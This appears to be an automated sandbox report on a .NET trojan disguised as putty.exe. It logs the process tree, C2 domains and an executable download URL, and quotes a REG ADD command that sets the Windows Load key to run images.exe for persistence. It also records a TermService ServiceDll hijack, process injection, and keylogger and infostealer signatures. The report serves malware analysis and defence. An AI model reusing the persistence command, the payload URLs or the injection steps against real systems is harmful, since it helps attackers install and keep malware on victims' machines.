Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 3, 2021, 9:07 a.m.	Aug. 3, 2021, 9:09 a.m.

Size	714.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`0cfe251e0b61bbc87656f52defad4c53`
SHA256	`db531d6e969f16a9318224e16a18f3314fa75d0eaad90fc9a805f10d098d67c9`
CRC32	`140C09BD`
ssdeep	`12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) IsPE32 - (no description) Admin_Tool_IN_Zero - Admin Tool Sysinternals

putty.exe "C:\Users\test22\AppData\Local\Temp\putty.exe"
1868
- putty.exe "C:\Users\test22\AppData\Local\Temp\putty.exe"
  2840
  - cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
    560
    - reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
      2080
  - images.exe "C:\ProgramData\images.exe"
    1408
    - images.exe "C:\ProgramData\images.exe"
      1204
      - cmd.exe "C:\Windows\System32\cmd.exe"
        1476
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
hutyrtit.ydns.eu	A 203.159.80.165	203.159.80.165
sdafsdffssffs.ydns.eu	A 203.159.80.186	203.159.80.186

IP Address	Status	Action
164.124.101.2	Active	Moloch
203.159.80.165	Active	Moloch
203.159.80.186	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 203.159.80.165:80 -> 192.168.56.101:49211	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 3, 2021, 9:08 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Aug. 3, 2021, 9:08 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 3, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Aug. 3, 2021, 9:08 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 3, 2021, 9:08 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 3, 2021, 9:08 a.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Aug. 3, 2021, 9:08 a.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 3, 2021, 9:08 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 3, 2021, 9:07 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET http://hutyrtit.ydns.eu/microD.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 136 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00580000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72831000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72832000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00533000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00567000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00534000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00535000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00536000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00552000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00537000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef60000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6eeb2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:07 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00538000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00539000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02161000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02162000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02163000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02164000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02165000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02166000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02167000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02168000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1868 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Aug. 3, 2021, 9:01 a.m.	total_number_of_free_bytes: 13727518720 free_bytes_available: 13727518720 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Roaming\fdokknpsF.exe
file	C:\Windows\System32\rfxvmt.dll
file	C:\Program Files\Microsoft DN1\sqlmap.dll

Creates a suspicious process (2 events)

cmdline	C:\Windows\System32\cmd.exe
cmdline	cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"

Executes one or more WMI queries (1 event)

wmi

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 3, 2021, 9:08 a.m.	thread_identifier: 2044 thread_handle: 0x000001e8 process_identifier: 1476 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001e0	1	1	0

An executable file was downloaded by the process images.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Aug. 3, 2021, 9:09 a.m.	buffer: HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 02 Aug 2021 07:22:40 GMT Accept-Ranges: bytes ETag: "c6a7682d6f87d71:0" Server: Microsoft-IIS/8.5 Date: Tue, 03 Aug 2021 00:09:12 GMT Content-Length: 1467904 MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL@aàPVöu @ À@¤uOÌ H.textüU V `.rsrcÌX@@.reloc d@BØuH0«s,Üx( &( Îs s s! s" s# 0~o$ +0~o% +0~o& +0~o' +*0 received: 1024 socket: 1004	1	1024	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000b2000', u'virtual_address': u'0x00002000', u'entropy': 7.510337512883043, u'name': u'.text', u'virtual_size': u'0x000b1f60'}

entropy

7.51033751288

description

A section with a high entropy has been found

entropy

0.997198879552

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 3, 2021, 9:09 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (34 events)

description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	email clients info stealer	rule	infoStealer_emailClients_Zero
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	email clients info stealer	rule	infoStealer_emailClients_Zero
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Install itself for autorun at Windows startup	rule	Persistence

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Aug. 3, 2021, 9:09 a.m.	status_code: 0x00000000 process_identifier: 0 process_handle: 0x000002dc		0	0
NtTerminateProcess Aug. 3, 2021, 9:09 a.m.	status_code: 0x00000000 process_identifier: 0 process_handle: 0x000002dc	1	0	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
cmdline	cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"

Allocates execute permission to another process indicative of possible code injection (4 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 2840 region_size: 1433600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000200	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1204 region_size: 1433600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000200	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1476 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001f0	1
NtProtectVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1476 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a0000 process_handle: 0x000001f0	1

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load				reg_value	C:\ProgramData\images.exe
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll				reg_value	%ProgramFiles%\Microsoft DN1\sqlmap.dll

Potential code injection by writing to the memory of another process (8 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $n·ÇìäÇìäÇìäã_äÆìäÎäÆìäã]äÅìäàmäÆìäànäÄìäÂàäÆìäÎäÃìäÎäØìäÇìä5ìäT å°ìäTåÆìäRichÇìäPELrìE_àRP(^p@à@ª,°à0©p.textwPR `.rdata\|NpPV@@.dataÐíÀ¨¦@À.relocà°N@B.bssÐ`@@ base_address: 0x00400000 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: 2Aç¾d\|ÆáªøbcËÅ×fíT!¬$:íÖüCßG½ ë8æ·È7¶/ØH<T' o¦7ùök¬¶ÔáuÐÄé3!$¡Ö¤$ä_xål¨ÇÐ"k;vQ3øµÜfÂk\|ß´x¤G}Ç]}» àK êöU;2x hl»£f?5¶8×a´X@ú½GDÌ\|yû°¨`Te1(@B base_address: 0x0055d000 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $n·ÇìäÇìäÇìäã_äÆìäÎäÆìäã]äÅìäàmäÆìäànäÄìäÂàäÆìäÎäÃìäÎäØìäÇìä5ìäT å°ìäTåÆìäRichÇìäPELrìE_àRP(^p@à@ª,°à0©p.textwPR `.rdata\|NpPV@@.dataÐíÀ¨¦@À.relocà°N@B.bssÐ`@@ base_address: 0x00400000 process_identifier: 1204 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: 2Aç¾d\|ÆáªøbcËÅ×fíT!¬$:íÖüCßG½ ë8æ·È7¶/ØH<T' o¦7ùök¬¶ÔáuÐÄé3!$¡Ö¤$ä_xål¨ÇÐ"k;vQ3øµÜfÂk\|ß´x¤G}Ç]}» àK êöU;2x hl»£f?5¶8×a´X@ú½GDÌ\|yû°¨`Te1(@B base_address: 0x0055d000 process_identifier: 1204 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1204 process_handle: 0x00000200	1	1
